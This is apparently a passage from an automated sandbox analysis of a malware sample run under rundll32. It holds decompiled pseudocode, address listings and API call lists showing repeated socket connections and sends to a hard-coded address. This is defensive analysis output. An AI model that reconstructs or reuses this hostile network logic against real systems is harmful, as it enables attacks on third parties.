																																		goto L140;
																																	} else {
																																		_t469 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0xc))); // executed
																																		__eflags = _t469;
																																		if(_t469 != 0) {
																																			goto L140;
																																		} else {
																																			_t471 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x10))); // executed
																																			__eflags = _t471;
																																			if(_t471 != 0) {
																																				goto L140;
																																			} else {
																																				_t473 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
																																				__eflags = _t473;
																																				if(_t473 != 0) {
																																					goto L140;
																																				} else {
																																					_t475 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x14))); // executed
																																					__eflags = _t475;
																																					if(_t475 != 0) {
																																						goto L140;
																																					} else {
																																						_t477 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
																																						__eflags = _t477;
																																						if(_t477 != 0) {
																																							goto L140;
																																						} else {
																																							_t479 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
																																							__eflags = _t479;
																																							if(_t479 != 0) {
																																								goto L140;
																																							} else {
																																								_t481 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x18))); // executed
																																								__eflags = _t481;
																																								if(_t481 != 0) {
																																									goto L140;
																																								} else {
																																									_t483 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x1c))); // executed
																																									__eflags = _t483;
																																									if(_t483 != 0) {
																																										goto L140;
																																									} else {
																																										_t485 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
																																										__eflags = _t485;
																																										if(_t485 != 0) {
																																											goto L140;
																																										} else {
																																											_t487 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
																																											__eflags = _t487;
																																											if(_t487 != 0) {
																																												goto L140;
																																											} else {
																																												_t489 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x20))); // executed
																																												__eflags = _t489;
																																												if(_t489 != 0) {
																																													goto L140;
																																												} else {
																																													_t491 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x24))); // executed
																																													__eflags = _t491;
																																													if(_t491 != 0) {
																																														goto L140;
																																													} else {
																																														_t493 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
																																														__eflags = _t493;
																																														if(_t493 != 0) {
																																															goto L140;
																																														} else {
																																															_t495 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
																																															__eflags = _t495;
																																															if(_t495 != 0) {
																																																goto L140;
																																															} else {
																																																_t497 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x28))); // executed
																																																__eflags = _t497;
																																																if(_t497 != 0) {
																																																	goto L140;
																																																} else {
																																																	_t499 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
																																																	__eflags = _t499;
																																																	if(_t499 != 0) {
																																																		goto L140;
																																																	} else {
																																																		_t501 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x2c))); // executed
																																																		__eflags = _t501;
																																																		if(_t501 != 0) {
																																																			goto L140;
																																																		} else {
																																																			_t503 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
																																																			__eflags = _t503;
																																																			if(_t503 != 0) {
																																																				goto L140;
																																																			} else {
																																																				_t505 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x30))); // executed
																																																				__eflags = _t505;
																																																				if(_t505 != 0) {
																																																					goto L140;
																																																				} else {
																																																					_t507 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
																																																					__eflags = _t507;
																																																					if(_t507 != 0) {
																																																						goto L140;
																																																					} else {
																																																						_t509 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x34))); // executed
																																																						__eflags = _t509;
																																																						if(_t509 != 0) {
																																																							goto L140;
																																																						} else {
																																																							_t511 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
																																																							__eflags = _t511;
																																																							if(_t511 != 0) {
																																																								goto L140;
																																																							} else {
																																																								_t513 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x38))); // executed
																																																								__eflags = _t513;
																																																								if(_t513 != 0) {
																																																									goto L140;
																																																								} else {
																																																									Sleep(0x456);
																																																									_t564 = _v49;
																																																									_t515 = E011E2EF5( *(_t635 + 0x3c), _t568, 0xc053, _t609, _v41, _t564); // executed
																																																									__eflags = _t515;
																																																									if(_t515 != 0) {
																																																										goto L138;
																																																									} else {
																																																										_t520 = E011E2F88( *(_t635 + 0x3c), _t568, 0x4007, _t609, _v41,  &_v13, _t564, 0xc, 0x12c, 0x87f8,  &_v33,  &_v21); // executed
																																																										__eflags = _t520;
																																																										if(_t520 != 0) {
																																																											goto L138;
																																																										} else {
																																																											_t521 =  *(_t635 + 4);
																																																											__eflags = _t521;
																																																											if(_t521 != 0) {
																																																												__imp__#3(_t521);
																																																												_t187 = _t635 + 4;
																																																												 *_t187 =  *(_t635 + 4) & 0x00000000;
																																																												__eflags =  *_t187;
																																																											}
																																																											_t566 =  &_v54;
																																																											_t523 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
																																																											__eflags = _t523;
																																																											if(_t523 != 0) {
																																																												goto L140;
																																																											} else {
																																																												_t525 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x40))); // executed
																																																												__eflags = _t525;
																																																												if(_t525 != 0) {
																																																													goto L140;
																																																												} else {
																																																													_t527 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
																																																													__eflags = _t527;
																																																													if(_t527 != 0) {
																																																														goto L140;
																																																													} else {
																																																														_t529 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
																																																														__eflags = _t529;
																																																														if(_t529 != 0) {
																																																															goto L140;
																																																														} else {
																																																															_t531 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x44))); // executed
																																																															__eflags = _t531;
																																																															if(_t531 != 0) {
																																																																goto L140;
																																																															} else {
																																																																_t533 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
																																																																__eflags = _t533;
																																																																if(_t533 != 0) {
																																																																	goto L140;
																																																																} else {
																																																																	_t535 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x48))); // executed
																																																																	__eflags = _t535;
																																																																	if(_t535 != 0) {
																																																																		goto L140;
																																																																	} else {
																																																																		_t537 = E011E6727( &_a4, _t566,  &_a4, _a8, _a12); // executed
																																																																		__eflags = _t537;
																																																																		if(_t537 != 0) {
																																																																			goto L140;
																																																																		} else {
																																																																			_t539 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x4c))); // executed
																																																																			__eflags = _t539;
																																																																			if(_t539 != 0) {
																																																																				goto L140;
																																																																			} else {
																																																																				_t541 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x50))); // executed
																																																																				__eflags = _t541;
																																																																				if(_t541 != 0) {
																																																																					goto L140;
																																																																				} else {
																																																																					_t542 =  *(_t635 + 0x3c);
																																																																					__eflags = _t542;
																																																																					if(_t542 != 0) {
																																																																						__imp__#3(_t542);
																																																																						_t211 = _t635 + 0x3c;
																																																																						 *_t211 =  *(_t635 + 0x3c) & 0x00000000;
																																																																						__eflags =  *_t211;
																																																																					}
																																																																					_t564 = _v49;
																																																																					_t544 = E011E369D( *_t635, _t568, _t609, _v45, _v41, _v53, _t564); // executed
																																																																					_push(_t564);
																																																																					_push(_v73);
																																																																					_push(_v61);
																																																																					_push(_v65);
																																																																					_push(_t609);
																																																																					_push( *_t635);
																																																																					__eflags = _t544;
																																																																					if(_t544 != 0) {
																																																																						L130:
																																																																						_push(0xffffffff); // executed
																																																																						L131:
																																																																						_t374 = E011E5A46(); // executed
																																																																					} else {
																																																																						_t545 = E011E3C0A(_t568); // executed
																																																																						__eflags = _t545;
																																																																						if(_t545 != 0) {
																																																																							goto L138;
																																																																						} else {
																																																																							_v21 = 2;
																																																																							do {
																																																																								__eflags = _v21 - 0xf;
																																																																								if(_v21 == 0xf) {
																																																																									goto L84;
																																																																								} else {
																																																																									_t548 = E011E3CA0(1, _t568,  *((intOrPtr*)(_t635 + _v21 * 4))); // executed
																																																																									__eflags = _t548;
																																																																									if(_t548 != 0) {
																																																																										goto L138;
																																																																									} else {
																																																																										goto L84;
																																																																									}
																																																																								}
																																																																								goto L132;
																																																																								L84:
																																																																								_v21 = _v21 + 1;
																																																																								__eflags = _v21 - 0x14;
																																																																							} while (_v21 < 0x14);
																																																																							_t567 = 2;
																																																																							while(1) {
																																																																								__eflags = _t567 - 0xf;
																																																																								if(_t567 == 0xf) {
																																																																									goto L89;
																																																																								}
																																																																								L88:
																																																																								_t550 = E011E3CA0(2, _t568,  *((intOrPtr*)(_t635 + _t567 * 4))); // executed
																																																																								__eflags = _t550;
																																																																								if(_t550 != 0) {
																																																																									goto L140;
																																																																								} else {
																																																																									goto L89;
																																																																								}
																																																																								goto L132;
																																																																								L89:
																																																																								_t567 = _t567 + 1;
																																																																								__eflags = _t567 - 0x14;
																																																																								if(_t567 < 0x14) {
																																																																									_t635 = _a4;
																																																																									_t609 = _v37;
																																																																									__eflags = _t567 - 0xf;
																																																																									if(_t567 == 0xf) {
																																																																										goto L89;
																																																																									}
																																																																								} else {
																																																																									_t557 = _a4;
																																																																									goto L91;
																																																																								}
																																																																								goto L132;
																																																																							}
																																																																						}
																																																																					}
																																																																				}
																																																																			}
																																																																		}
																																																																	}
																																																																}
																																																															}
																																																														}
																																																													}
																																																												}
																																																											}
																																																										}
																																																									}
																																																								}
																																																							}
																																																						}
																																																					}
																																																				}
																																																			}
																																																		}
																																																	}
																																																}
																																															}
																																														}
																																													}
																																												}
																																											}
																																										}
																																									}
																																								}
																																							}
																																						}
																																					}
																																				}
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				} else {
																					__eflags = _v29 - 6;
																					if(_v29 == 6) {
																						goto L27;
																					} else {
																						__eflags = _v29 - 7;
																						if(_v29 != 7) {
																							L91:
																							E011E5A46(0,  *_t557, _v37, _v45, _v41, _v53, _v49); // executed
																							E011E2068(_t557);
																							Sleep(0x456);
																							continue;
																						} else {
																							goto L27;
																						}
																					}
																				}
																			} else {
																				goto L16;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					L132:
					return _t374;
				}
				_t374 = _t369 | 0xffffffff;
				goto L132;
			}












































































































































    0x011e5a7e
    0x011e62fc
    0x011e630a
    0x011e630f
    0x011e6316
    0x00000000
    0x00000000
    0x011e5a8f
    0x011e5a97
    0x011e5a9e
    0x011e5aa2
    0x011e5aa6
    0x011e5aaa
    0x011e5aae
    0x011e5ab9
    0x011e5abc
    0x011e5ac7
    0x011e5acb
    0x011e5acf
    0x011e5ad3
    0x011e5ad7
    0x011e5adc
    0x011e5ade
    0x00000000
    0x011e5ae4
    0x011e5b07
    0x011e5b0c
    0x011e5b0e
    0x00000000
    0x011e5b14
    0x011e5b14
    0x011e5b18
    0x011e5b1a
    0x011e6357
    0x011e6357
    0x011e635b
    0x011e635f
    0x011e6360
    0x00000000
    0x011e5b20
    0x011e5b2d
    0x011e5b31
    0x011e5b36
    0x011e5b3b
    0x011e6355
    0x011e6355
    0x00000000
    0x011e5b41
    0x011e5b55
    0x011e5b5a
    0x011e5b5c
    0x011e6375
    0x011e6379
    0x011e637d
    0x011e637e
    0x011e6361
    0x011e6361
    0x011e6365
    0x011e6367
    0x011e636e
    0x00000000
    0x011e5b62
    0x011e5b64
    0x011e5b69
    0x011e5b6d
    0x011e5b6f
    0x00000000
    0x011e5b75
    0x011e5ba1
    0x011e5baa
    0x011e5bae
    0x011e5bb3
    0x011e5bb8
    0x011e6618
    0x011e6618
    0x011e661c
    0x011e6620
    0x00000000
    0x011e5bbe
    0x011e5bbe
    0x011e5bc2
    0x011e5bc4
    0x00000000
    0x011e5bca
    0x011e5bcc
    0x011e5bcd
    0x011e5bd1
    0x011e6384
    0x011e6387
    0x011e638e
    0x011e6390
    0x011e6392
    0x011e6392
    0x011e6398
    0x011e639b
    0x011e639d
    0x011e639d
    0x011e63a3
    0x011e63a7
    0x011e6400
    0x011e6404
    0x011e6409
    0x011e640e
    0x00000000
    0x011e6414
    0x011e6414
    0x011e6419
    0x011e641e
    0x011e6420
    0x011e6427
    0x011e6437
    0x011e643c
    0x011e6429
    0x011e6429
    0x011e642b
    0x011e6430
    0x011e6430
    0x011e6459
    0x011e646f
    0x011e6489
    0x011e6490
    0x011e6499
    0x011e64a7
    0x011e64ac
    0x011e64ae
    0x00000000
    0x011e64b4
    0x011e64b4
    0x011e64bc
    0x011e64c0
    0x011e64c4
    0x011e64c4
    0x011e64c7
    0x011e64cb
    0x011e64ce
    0x011e64ce
    0x011e64ce
    0x011e64ce
    0x011e64d6
    0x011e64db
    0x011e64df
    0x011e64e1
    0x011e663b
    0x011e663b
    0x00000000
    0x011e64e7
    0x011e64e7
    0x011e64ec
    0x00000000
    0x011e64f2
    0x011e64f8
    0x011e6505
    0x011e6507
    0x011e650c
    0x011e651f
    0x011e652b
    0x011e6538
    0x011e653d
    0x011e6542
    0x011e654a
    0x011e654e
    0x011e6550
    0x011e65a5
    0x011e65aa
    0x011e65b0
    0x011e65b6
    0x011e65ef
    0x011e65f3
    0x00000000
    0x011e65b8
    0x011e65e6
    0x011e65eb
    0x011e65ed
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e65ed
    0x011e6552
    0x011e6552
    0x011e6557
    0x011e6559
    0x00000000
    0x011e655b
    0x011e655b
    0x011e658a
    0x011e658f
    0x011e6591
    0x00000000
    0x00000000
    0x011e6593
    0x011e659b
    0x011e659f
    0x011e65a3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e65a3
    0x011e660f
    0x011e660f
    0x011e6613
    0x011e6613
    0x00000000
    0x011e6613
    0x011e6559
    0x011e6550
    0x011e64ec
    0x011e64e1
    0x011e64ae
    0x011e63a9
    0x011e63ad
    0x011e63b2
    0x011e63b6
    0x011e63ba
    0x011e63bb
    0x011e63bf
    0x011e63c3
    0x011e63c5
    0x011e63c5
    0x00000000
    0x011e5bd7
    0x011e5bdb
    0x011e5c06
    0x011e5c0b
    0x011e5c10
    0x00000000
    0x011e5c16
    0x011e5c16
    0x011e5c1a
    0x011e65f8
    0x011e65f8
    0x011e65fc
    0x011e6600
    0x011e6601
    0x011e6605
    0x011e6609
    0x011e660b
    0x00000000
    0x011e5c20
    0x011e5c20
    0x011e5c27
    0x00000000
    0x011e5c2d
    0x011e5c2d
    0x011e5c33
    0x011e5c38
    0x011e5c4c
    0x011e5c5d
    0x011e5c6d
    0x011e5c72
    0x011e5c74
    0x00000000
    0x011e5c7a
    0x011e5c7a
    0x011e5c84
    0x011e5c9b
    0x011e5c9f
    0x011e5ca4
    0x011e5ca6
    0x011e6641
    0x011e6641
    0x011e6645
    0x00000000
    0x011e5cac
    0x011e5cb2
    0x011e5cc8
    0x011e5cca
    0x011e6650
    0x011e6650
    0x011e6654
    0x011e6649
    0x011e6649
    0x011e664d
    0x00000000
    0x011e5cd0
    0x011e5cde
    0x011e5ce4
    0x011e5ce9
    0x011e5ceb
    0x00000000
    0x011e5cf1
    0x011e5d01
    0x011e5d06
    0x011e5d08
    0x00000000
    0x011e5d0e
    0x011e5d13
    0x011e5d1e
    0x011e5d23
    0x011e5d25
    0x00000000
    0x011e5d2b
    0x011e5d2b
    0x011e5d2f
    0x011e5d30
    0x011e5d34
    0x011e5d38
    0x011e5d39
    0x011e5d3d
    0x011e5d43
    0x011e5d48
    0x011e5d4a
    0x00000000
    0x011e5d50
    0x011e5d50
    0x00000000
    0x011e5d50
    0x011e5d4a
    0x011e5d25
    0x011e5d08
    0x011e5ceb
    0x011e5cca
    0x011e5ca6
    0x011e5c3a
    0x011e5c3a
    0x011e5c3f
    0x00000000
    0x011e5c41
    0x011e5c41
    0x011e5c46
    0x011e5d53
    0x011e5d53
    0x011e5d58
    0x011e5d6c
    0x011e5d70
    0x011e5d76
    0x011e5d8b
    0x011e5d90
    0x011e5d94
    0x011e5d96
    0x011e6344
    0x011e6344
    0x011e6348
    0x011e634c
    0x011e6621
    0x011e6621
    0x011e6625
    0x011e6625
    0x011e6629
    0x00000000
    0x011e5d9c
    0x011e5da1
    0x011e5da6
    0x011e5daa
    0x011e5dac
    0x011e6328
    0x00000000
    0x011e5db2
    0x011e5db7
    0x011e5dc3
    0x011e5dc8
    0x011e5dca
    0x011e632f
    0x011e6333
    0x011e633c
    0x00000000
    0x011e5dd0
    0x011e5dd0
    0x011e5ddc
    0x011e5de1
    0x011e5de3
    0x00000000
    0x011e5de9
    0x011e5df0
    0x011e5df9
    0x011e5dfe
    0x011e5e00
    0x011e6341
    0x011e6341
    0x00000000
    0x011e5e06
    0x011e5e1b
    0x011e5e20
    0x011e5e22
    0x00000000
    0x011e5e28
    0x011e5e2d
    0x011e5e41
    0x011e5e46
    0x011e5e48
    0x011e6657
    0x011e6657
    0x011e665e
    0x011e6662
    0x011e6666
    0x011e666a
    0x011e666e
    0x00000000
    0x011e5e4e
    0x011e5e4e
    0x011e5e52
    0x011e5e56
    0x011e5e67
    0x011e5e6c
    0x011e5e6e
    0x011e6672
    0x011e6672
    0x00000000
    0x011e5e74
    0x011e5e74
    0x011e5ea1
    0x011e5ea6
    0x011e5ea8
    0x00000000
    0x011e5eae
    0x011e5eb7
    0x011e5ebc
    0x011e5ec1
    0x011e5ec3
    0x011e6684
    0x011e6684
    0x011e6673
    0x011e6673
    0x011e6677
    0x011e667b
    0x011e667f
    0x011e6680
    0x00000000
    0x011e5ec9
    0x011e5ed3
    0x011e5ed8
    0x011e5eda
    0x00000000
    0x011e5ee0
    0x011e5ee5
    0x011e5eea
    0x011e5eec
    0x00000000
    0x011e5ef2
    0x011e5efc
    0x011e5f01
    0x011e5f03
    0x00000000
    0x011e5f09
    0x011e5f0e
    0x011e5f13
    0x011e5f15
    0x00000000
    0x011e5f1b
    0x011e5f20
    0x011e5f25
    0x011e5f27
    0x00000000
    0x011e5f2d
    0x011e5f37
    0x011e5f3c
    0x011e5f3e
    0x00000000
    0x011e5f44
    0x011e5f49
    0x011e5f4e
    0x011e5f50
    0x00000000
    0x011e5f56
    0x011e5f60
    0x011e5f65
    0x011e5f67
    0x00000000
    0x011e5f6d
    0x011e5f77
    0x011e5f7c
    0x011e5f7e
    0x00000000
    0x011e5f84
    0x011e5f89
    0x011e5f8e
    0x011e5f90
    0x00000000
    0x011e5f96
    0x011e5f9b
    0x011e5fa0
    0x011e5fa2
    0x00000000
    0x011e5fa8
    0x011e5fb2
    0x011e5fb7
    0x011e5fb9
    0x00000000
    0x011e5fbf
    0x011e5fc9
    0x011e5fce
    0x011e5fd0
    0x00000000
    0x011e5fd6
    0x011e5fdb
    0x011e5fe0
    0x011e5fe2
    0x00000000
    0x011e5fe8
    0x011e5fed
    0x011e5ff2
    0x011e5ff4
    0x00000000
    0x011e5ffa
    0x011e6004
    0x011e6009
    0x011e600b
    0x00000000
    0x011e6011
    0x011e601b
    0x011e6020
    0x011e6022
    0x00000000
    0x011e6028
    0x011e602d
    0x011e6032
    0x011e6034
    0x00000000
    0x011e603a
    0x011e6044
    0x011e6049
    0x011e604b
    0x00000000
    0x011e6051
    0x011e6056
    0x011e605b
    0x011e605d
    0x00000000
    0x011e6063
    0x011e606d
    0x011e6072
    0x011e6074
    0x00000000
    0x011e607a
    0x011e607f
    0x011e6084
    0x011e6086
    0x00000000
    0x011e608c
    0x011e6096
    0x011e609b
    0x011e609d
    0x00000000
    0x011e60a3
    0x011e60a8
    0x011e60ad
    0x011e60af
    0x00000000
    0x011e60b5
    0x011e60bf
    0x011e60c4
    0x011e60c6
    0x00000000
    0x011e60cc
    0x011e60d1
    0x011e60d6
    0x011e60d8
    0x00000000
    0x011e60de
    0x011e60e3
    0x011e60e9
    0x011e60fb
    0x011e6100
    0x011e6102
    0x00000000
    0x011e6108
    0x011e6131
    0x011e6136
    0x011e6138
    0x00000000
    0x011e613e
    0x011e613e
    0x011e6141
    0x011e6143
    0x011e6146
    0x011e614c
    0x011e614c
    0x011e614c
    0x011e614c
    0x011e6159
    0x011e615e
    0x011e6163
    0x011e6165
    0x00000000
    0x011e616b
    0x011e6170
    0x011e6175
    0x011e6177
    0x00000000
    0x011e617d
    0x011e6187
    0x011e618c
    0x011e618e
    0x00000000
    0x011e6194
    0x011e619e
    0x011e61a3
    0x011e61a5
    0x00000000
    0x011e61ab
    0x011e61b0
    0x011e61b5
    0x011e61b7
    0x00000000
    0x011e61bd
    0x011e61c7
    0x011e61cc
    0x011e61ce
    0x00000000
    0x011e61d4
    0x011e61d9
    0x011e61de
    0x011e61e0
    0x00000000
    0x011e61e6
    0x011e61f0
    0x011e61f5
    0x011e61f7
    0x00000000
    0x011e61fd
    0x011e6202
    0x011e6207
    0x011e6209
    0x00000000
    0x011e620f
    0x011e6214
    0x011e6219
    0x011e621b
    0x00000000
    0x011e6221
    0x011e6221
    0x011e6224
    0x011e6226
    0x011e6229
    0x011e622f
    0x011e622f
    0x011e622f
    0x011e622f
    0x011e6233
    0x011e6247
    0x011e624c
    0x011e624d
    0x011e6251
    0x011e6255
    0x011e6259
    0x011e625a
    0x011e625c
    0x011e625e
    0x011e662b
    0x011e662b
    0x011e662d
    0x011e662d
    0x011e6264
    0x011e6264
    0x011e6269
    0x011e626b
    0x00000000
    0x011e6271
    0x011e6271
    0x011e6279
    0x011e6279
    0x011e627e
    0x00000000
    0x011e6280
    0x011e6289
    0x011e628e
    0x011e6290
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e6290
    0x00000000
    0x011e6296
    0x011e6296
    0x011e629a
    0x011e629a
    0x011e62a3
    0x011e62ad
    0x011e62ad
    0x011e62b0
    0x00000000
    0x00000000
    0x011e62b2
    0x011e62b7
    0x011e62bc
    0x011e62be
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e62c4
    0x011e62c4
    0x011e62c5
    0x011e62c8
    0x011e62a6
    0x011e62a9
    0x011e62ad
    0x011e62b0
    0x00000000
    0x00000000
    0x011e62ca
    0x011e62ca
    0x00000000
    0x011e62ca
    0x00000000
    0x011e62c8
    0x011e62ad
    0x011e626b
    0x011e625e
    0x011e621b
    0x011e6209
    0x011e61f7
    0x011e61e0
    0x011e61ce
    0x011e61b7
    0x011e61a5
    0x011e618e
    0x011e6177
    0x011e6165
    0x011e6138
    0x011e6102
    0x011e60d8
    0x011e60c6
    0x011e60af
    0x011e609d
    0x011e6086
    0x011e6074
    0x011e605d
    0x011e604b
    0x011e6034
    0x011e6022
    0x011e600b
    0x011e5ff4
    0x011e5fe2
    0x011e5fd0
    0x011e5fb9
    0x011e5fa2
    0x011e5f90
    0x011e5f7e
    0x011e5f67
    0x011e5f50
    0x011e5f3e
    0x011e5f27
    0x011e5f15
    0x011e5f03
    0x011e5eec
    0x011e5eda
    0x011e5ec3
    0x011e5ea8
    0x011e5e6e
    0x011e5e48
    0x011e5e22
    0x011e5e00
    0x011e5de3
    0x011e5dca
    0x011e5dac
    0x011e5d5a
    0x011e5d5a
    0x011e5d5f
    0x00000000
    0x011e5d61
    0x011e5d61
    0x011e5d66
    0x011e62cd
    0x011e62e5
    0x011e62ec
    0x011e62f6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e5d66
    0x011e5d5f
    0x00000000
    0x00000000
    0x00000000
    0x011e5c46
    0x011e5c3f
    0x011e5c38
    0x011e5c27
    0x011e5c1a
    0x011e5c10
    0x011e5bd1
    0x011e5bc4
    0x011e5bb8
    0x011e5b6f
    0x011e5b5c
    0x011e5b3b
    0x011e5b1a
    0x011e5b0e
    0x011e6632
    0x011e6638
    0x011e6638
    0x011e631c
    0x00000000

    APIs
      • Part of subcall function 011E6727: socket.WS2_32(00000002,00000001,00000006), ref: 011E6737
      • Part of subcall function 011E6727: ioctlsocket.WS2_32(00000000,8004667E,000001BD), ref: 011E674C
      • Part of subcall function 011E6727: htons.WS2_32(00058778), ref: 011E6784
      • Part of subcall function 011E6727: inet_addr.WS2_32(002F1C10), ref: 011E6791
      • Part of subcall function 011E6727: connect.WS2_32(00000000,?,00000010), ref: 011E67A1
      • Part of subcall function 011E20B2: GetTickCount.KERNEL32(011E5A94), ref: 011E20B2
      • Part of subcall function 011E2F88: memcpy.MSVCRT ref: 011E304E
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
      • Part of subcall function 011E3EC8: rand.MSVCRT ref: 011E4030
    • rand.MSVCRT ref: 011E5C7A
      • Part of subcall function 011E407B: memcpy.MSVCRT ref: 011E4138
      • Part of subcall function 011E407B: memcpy.MSVCRT ref: 011E418C
      • Part of subcall function 011E407B: Sleep.KERNEL32(00000456,00001000,002F1C10,?,002F1C10,?,0000C000,00008000,00000002,002F1C10,76E6C426,0000008E,00000000,000000FF,00058778,002F1C10), ref: 011E4287
      • Part of subcall function 011E42DF: rand.MSVCRT ref: 011E4302
      • Part of subcall function 011E42DF: memcpy.MSVCRT ref: 011E4397
      • Part of subcall function 011E42DF: memcpy.MSVCRT ref: 011E43EA
      • Part of subcall function 011E489C: memcpy.MSVCRT ref: 011E492E
      • Part of subcall function 011E489C: memcpy.MSVCRT ref: 011E497E
      • Part of subcall function 011E2547: memcpy.MSVCRT ref: 011E2613
      • Part of subcall function 011E688F: memset.MSVCRT ref: 011E68AE
      • Part of subcall function 011E688F: select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
      • Part of subcall function 011E688F: send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
      • Part of subcall function 011E3B5D: memset.MSVCRT ref: 011E3B95
    • Sleep.KERNELBASE(00000456,?,?,?,?,?,?,?,00000001,?,?,?,00001000,?,?,?), ref: 011E5E2D
    • Sleep.KERNELBASE(00000456,?,?,002F1C10,00058778,?,?,002F1C10,00058778,?,?,002F1C10,00058778,?,?,002F1C10), ref: 011E60E3
    • closesocket.WS2_32(?), ref: 011E6146
    • closesocket.WS2_32(?), ref: 011E6229
      • Part of subcall function 011E3C0A: memset.MSVCRT ref: 011E3C2F
      • Part of subcall function 011E3C0A: memset.MSVCRT ref: 011E3C5D
    • Sleep.KERNELBASE(00000456,00000000,?,00000014,?,?,?,?,?,?,?,?,?,?,?,?), ref: 011E62F6
      • Part of subcall function 011E2068: closesocket.WS2_32(?), ref: 011E2076
      • Part of subcall function 011E20EA: FindResourceW.KERNEL32(00000004,0000000A,0000FEFF), ref: 011E210C
    • memcpy.MSVCRT ref: 011E64F8
    • memcpy.MSVCRT ref: 011E651F
    • Sleep.KERNELBASE(00000456), ref: 011E65AA
      • Part of subcall function 011E3DD7: memcpy.MSVCRT ref: 011E3E22
      • Part of subcall function 011E330E: memcpy.MSVCRT ref: 011E33A1
      • Part of subcall function 011E330E: memcpy.MSVCRT ref: 011E345F
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011EA2E8, Relevance: 12.1, APIs: 8, Instructions: 86
    APIs
    • memset.MSVCRT ref: 011EA317
    • socket.WS2_32(00000002,00000001,00000000), ref: 011EA335
    • htons.WS2_32(?), ref: 011EA355
    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 011EA369
    • connect.WS2_32(00000000,?,00000010), ref: 011EA37B
    • select.WS2_32(00000001,00000000,?,00000000,?), ref: 011EA3A8
    • __WSAFDIsSet.WS2_32(00000000,?), ref: 011EA3BB
    • closesocket.WS2_32(00000000), ref: 011EA3C9
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E1F74, Relevance: 10.6, APIs: 7, Instructions: 85
    C-Code - Quality: 100%
    			E011E1F74(void* _a4, int _a8, void* _a12, int _a16, void* _a20, int _a24, void** _a28, long* _a32, void* _a36, intOrPtr _a40, void* _a44, intOrPtr _a48) {
				long _t26;
				void* _t28;
				void* _t30;
				int _t37;
				void** _t44;
				int _t46;
				void* _t52;
				void* _t54;
				void* _t55;
				int _t57;

				_t46 = _a24;
				_t57 = _a16;
				_t26 = _t57 + _t46 + 0x76fc2;
				 *_a32 = _t26;
				if(_a40 >= 0x2000) {
					_a40 = 0x1fff;
				}
				if(_a48 > 0x80) {
					_a48 = 0x7f;
				}
